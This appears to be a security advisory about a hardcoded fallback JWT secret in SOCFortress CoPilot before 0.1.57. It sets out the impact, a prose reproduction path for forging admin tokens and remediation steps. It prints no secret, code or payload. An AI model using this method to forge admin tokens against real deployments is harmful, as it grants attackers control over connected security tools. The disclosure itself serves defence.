SOCFortress CoPilot Hardcoded JWT Secret Vulnerability Allows Unauthenticated Admin Access

A vulnerability exists in SOCFortress CoPilot versions prior to 0.1.57, where a hardcoded JWT signing secret is used as a fallback in the authentication module. This secret is publicly known and is also included in the example environment file. Deployments that do not explicitly set the JWT_SECRET variable, such as those using the default Docker Compose configuration, will sign authentication tokens with this compromised value. As a result, an unauthenticated attacker can create admin-scoped JWTs, gaining full control over the application and all managed security tools without any credentials.

Impact

Exploitation of this vulnerability allows for complete administrative access to the SOCFortress CoPilot application and all integrated security tools, such as Wazuh, Graylog, DFIR-IRIS, Cortex, and Velociraptor, without any authentication.

Reproduction

The vulnerability can be reproduced by deploying SOCFortress CoPilot without setting the JWT_SECRET environment variable, using the default Docker Compose setup. Once the application is running, an admin JWT can be forged using the hardcoded secret, which will bypass authentication and grant access to admin privileges. This process can be automated with a published proof-of-concept that demonstrates the exploitation and its impact.

Remediation

Users should update to SOCFortress CoPilot version 0.1.57 or later, and ensure that the JWT_SECRET environment variable is set to a secure, unique value. After updating, the application can be restarted to load the new secret. For deployments using TOTP (two-factor authentication), it is important to set the TOTP_ENCRYPTION_KEY variable before rotating the JWT_SECRET to avoid losing access to enrolled TOTP secrets.